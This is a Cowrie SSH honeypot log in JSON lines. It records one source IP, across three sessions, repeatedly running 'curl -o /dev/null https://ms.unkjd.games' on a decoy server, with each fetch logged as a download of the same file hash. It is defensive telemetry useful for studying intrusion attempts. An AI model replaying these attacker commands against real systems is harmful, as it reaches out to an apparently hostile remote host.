{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.295558Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.297977Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.302731Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.308668Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.309320Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.334886Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.335759Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.341225Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.344123Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.348480Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.349241Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.375249Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.377109Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.381917Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.382886Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.391822Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.392737Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.397791Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.398555Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.429699Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.430450Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.433205Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.434085Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.439389Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.442902Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.445611Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.446613Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.484410Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.485915Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.488263Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.489279Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.495364Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.501361Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.525727Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.526814Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.527359Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.530448Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.531487Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.533146Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.534417Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.539460Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.542129Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.567975Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.569071Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.569514Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.587641Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.600358Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.603029Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.603897Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.608972Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.612984Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.641126Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.641933Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.674411Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.675433Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.677065Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.678132Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.687192Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.691297Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.719394Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.720164Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.723222Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.723888Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.725216Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.725827Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.729130Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.734605Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.737110Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.739805Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.766980Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.767697Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.769905Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.770550Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.774624Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.775477Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.780035Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.782757Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.787437Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.812455Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.813123Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.814858Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.815895Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:33.817664Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:33.818301Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
